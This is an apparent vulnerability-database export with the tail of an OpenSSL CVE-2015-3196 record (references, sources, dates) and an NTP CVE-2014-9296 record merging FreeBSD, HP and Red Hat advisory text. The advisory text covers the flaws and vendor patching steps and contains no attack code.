        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3196"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195"
      },
      {
        "trust": 0.6,
        "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=3c66a669dfc7b3792f7af0758ea26fe8502ce70c"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
      },
      {
        "trust": 0.4,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05398322"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3193"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1794"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2015-3196"
      },
      {
        "trust": 0.3,
        "url": "https://kb.netapp.com/support/index?page=content\u0026id=9010051\u0026actp=rss"
      },
      {
        "trust": 0.3,
        "url": "http://openssl.org/"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1288326"
      },
      {
        "trust": 0.3,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10203"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/dec/23"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04944173"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023836"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023987"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099426"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021091"
      },
      {
        "trust": 0.3,
        "url": "http://www.ibm.com/support/docview.wss?uid=swg21979528"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000128"
      },
      {
        "trust": 0.3,
        "url": "http://www.ibm.com/support/docview.wss?uid=swg21979761"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005694"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005702"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974459"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976148"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977265"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978085"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978238"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978239"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979086"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980207"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980965"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980969"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981612"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982877"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982883"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983532"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984021"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000058"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory15.asc"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983823"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982347"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2015-3194"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2015-3195"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/362.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2015-3196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2015:2617"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2830-1/"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=42531"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu11.5"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2d-0ubuntu1.2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.32"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.1,
        "url": "https://www.hpe.com/info/report-security-vulnerability"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3194"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3193"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3195"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://openssl.org/news/secadv_20151203.txt"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1794"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4448"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3216"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2106"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0702"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-8176"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-6808"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1838"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2107"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1839"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4483"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2842"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-8612"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1840"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0797"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3185"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1833"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=distributions\u0026version=2.4.23"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2105"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8176"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1840"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1836"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1762"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4449"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-0286"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1762"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5420"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2178"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2108"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3627"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2012-1148"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1837"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2109"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1834"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1837"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1839"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5419"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4459"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-0209"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3216"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1833"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1834"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4447"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-7141"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0799"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/about/secpolicy.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/about/releasestrat.html),"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/news/secadv/20151203.txt"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-3196"
      },
      {
        "db": "BID",
        "id": "78622"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      },
      {
        "db": "PACKETSTORM",
        "id": "134652"
      },
      {
        "db": "PACKETSTORM",
        "id": "141239"
      },
      {
        "db": "PACKETSTORM",
        "id": "134782"
      },
      {
        "db": "PACKETSTORM",
        "id": "134859"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "PACKETSTORM",
        "id": "134632"
      },
      {
        "db": "PACKETSTORM",
        "id": "169632"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-076"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3196"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2015-3196"
      },
      {
        "db": "BID",
        "id": "78622"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      },
      {
        "db": "PACKETSTORM",
        "id": "134652"
      },
      {
        "db": "PACKETSTORM",
        "id": "141239"
      },
      {
        "db": "PACKETSTORM",
        "id": "134782"
      },
      {
        "db": "PACKETSTORM",
        "id": "134859"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "PACKETSTORM",
        "id": "134632"
      },
      {
        "db": "PACKETSTORM",
        "id": "169632"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-076"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3196"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-12-06T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-3196"
      },
      {
        "date": "2015-12-03T00:00:00",
        "db": "BID",
        "id": "78622"
      },
      {
        "date": "2015-12-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      },
      {
        "date": "2015-12-07T16:36:58",
        "db": "PACKETSTORM",
        "id": "134652"
      },
      {
        "date": "2017-02-23T17:10:09",
        "db": "PACKETSTORM",
        "id": "141239"
      },
      {
        "date": "2015-12-14T16:39:59",
        "db": "PACKETSTORM",
        "id": "134782"
      },
      {
        "date": "2015-12-16T20:20:47",
        "db": "PACKETSTORM",
        "id": "134859"
      },
      {
        "date": "2016-12-16T16:34:49",
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "date": "2015-12-04T17:22:00",
        "db": "PACKETSTORM",
        "id": "134632"
      },
      {
        "date": "2015-12-03T12:12:12",
        "db": "PACKETSTORM",
        "id": "169632"
      },
      {
        "date": "2015-12-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-076"
      },
      {
        "date": "2015-12-06T20:59:06.913000",
        "db": "NVD",
        "id": "CVE-2015-3196"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-3196"
      },
      {
        "date": "2017-12-19T22:01:00",
        "db": "BID",
        "id": "78622"
      },
      {
        "date": "2016-05-31T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      },
      {
        "date": "2022-12-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-076"
      },
      {
        "date": "2023-11-07T02:25:31.830000",
        "db": "NVD",
        "id": "CVE-2015-3196"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "134652"
      },
      {
        "db": "PACKETSTORM",
        "id": "134782"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-076"
      }
    ],
    "trust": 0.8
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL of  ssl/s3_clnt.c Service disruption in  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "competition condition problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-076"
      }
    ],
    "trust": 0.6
  }
}

VAR-201412-0612

Vulnerability from variot - Updated: 2024-07-23 20:58

The receive function in ntp_proto.c in ntpd in NTP before 4.2.8 continues to execute after detecting a certain authentication error, which might allow remote attackers to trigger an unintended association change via crafted packets. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Network Time Protocol is prone to an unspecified security vulnerability. Little is known about this issue or its effects at this time. We will update this BID as more information emerges. Network Time Protocol 4.2.7 is vulnerable; other versions may also be affected. Corrected: 2014-14-22 19:07:16 UTC (stable/10, 10.1-STABLE) 2014-12-23 22:56:01 UTC (releng/10.1, 10.1-RELEASE-p3) 2014-12-23 22:55:14 UTC (releng/10.0, 10.0-RELEASE-p15) 2014-14-22 19:08:09 UTC (stable/9, 9.3-STABLE) 2014-12-23 22:54:25 UTC (releng/9.3, 9.3-RELEASE-p7) 2014-12-23 22:53:44 UTC (releng/9.2, 9.2-RELEASE-p17) 2014-12-23 22:53:03 UTC (releng/9.1, 9.1-RELEASE-p24) 2014-14-22 19:08:09 UTC (stable/8, 8.4-STABLE) 2014-12-23 22:52:22 UTC (releng/8.4, 8.4-RELEASE-p21) CVE Name: CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit .

II. [CVE-2014-9293] The ntp-keygen(8) utility is also affected by a similar issue. [CVE-2014-9294]

When Autokey Authentication is enabled, for example if ntp.conf(5) contains a 'crypto pw' directive, a remote attacker can send a carefully crafted packet that can overflow a stack buffer. [CVE-2014-9296]

III. Impact

IV. Workaround

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

freebsd-update fetch

freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch

fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch.asc

gpg --verify ntp.patch.asc

b) Apply the patch. Execute the following commands as root:

cd /usr/src

patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as described in .

Restart the ntpd(8) daemons, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path Revision

stable/8/ r276073 releng/8.4/ r276154 stable/9/ r276073 releng/9.1/ r276155 releng/9.2/ r276156 releng/9.3/ r276157 stable/10/ r276072 releng/10.0/ r276158 releng/10.1/ r276159

To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:

svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

VII. This situation may be exploitable by an attacker (CVE-2014-9296).

References:

Updated Packages:

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

Release Date: 2015-02-18 Last Updated: 2015-02-18

Potential Security Impact: Remote execution of code, Denial of Service (DoS), or other vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

References:

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP-UX B.11.31 running NTP version C.4.2.6.4.0 or previous HP-UX B.11.23 running XNTP version 3.5 or previous

BACKGROUND

CVSS 2.0 Base Metrics

RESOLUTION

HP has provided the following patch for HP-UX B.11.31. A workaround for HP-UX B.11.23 and B.11.11 to temporarily resolve these vulnerabilities follows below.

The B.11.31 patch is available from: ftp://ntp42650:Secure12@h2.usa.hp.com or https://h20392.www2.hp.com/portal/sw depot/displayProductInfo.do?productNumber=HPUX-NTP

Mitigation steps for HP-UX B.11.23 and B.11.11 for CVE-2014-9295

Restrict query for server status (Time Service is not affected) from ntpq/ntpdc by enabling .noquery. using the restrict command in /etc/ntp.conf file.

Reference: http://support.ntp.org/bin/view/Main/SecurityNotice

NOTE: This bulletin will be revised when patches for XNTP v3.5 on B.11.23 and B.11.11 become available.

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.31

NTP.INETSVCS2-BOOT NTP.NTP-AUX NTP.NTP-RUN action: install revision C.4.2.6.5.0 or subsequent

END AFFECTED VERSIONS

HISTORY Version:1 (rev.1) - 18 February 2015 Initial release

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

===================================================================== Red Hat Security Advisory

Synopsis: Important: ntp security update Advisory ID: RHSA-2014:2024-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-2024.html Issue date: 2014-12-20 CVE Names: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296 =====================================================================

Summary:

Updated ntp packages that fix several security issues are now available for Red Hat Enterprise Linux 6 and 7.

Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.

Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

A missing return statement in the receive() function could potentially allow a remote attacker to bypass NTP's authentication mechanism. (CVE-2014-9296)

All ntp users are advised to upgrade to this updated package, which contains backported patches to resolve these issues. After installing the update, the ntpd daemon will restart automatically.

Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: ntp-4.2.6p5-2.el6_6.src.rpm

i386: ntp-4.2.6p5-2.el6_6.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntpdate-4.2.6p5-2.el6_6.i686.rpm

x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntp-perl-4.2.6p5-2.el6_6.i686.rpm

noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: ntp-4.2.6p5-2.el6_6.src.rpm

x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: ntp-4.2.6p5-2.el6_6.src.rpm

i386: ntp-4.2.6p5-2.el6_6.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntpdate-4.2.6p5-2.el6_6.i686.rpm

ppc64: ntp-4.2.6p5-2.el6_6.ppc64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm ntpdate-4.2.6p5-2.el6_6.ppc64.rpm

s390x: ntp-4.2.6p5-2.el6_6.s390x.rpm ntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm ntpdate-4.2.6p5-2.el6_6.s390x.rpm

x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntp-perl-4.2.6p5-2.el6_6.i686.rpm

noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm

ppc64: ntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm ntp-perl-4.2.6p5-2.el6_6.ppc64.rpm

s390x: ntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm ntp-perl-4.2.6p5-2.el6_6.s390x.rpm

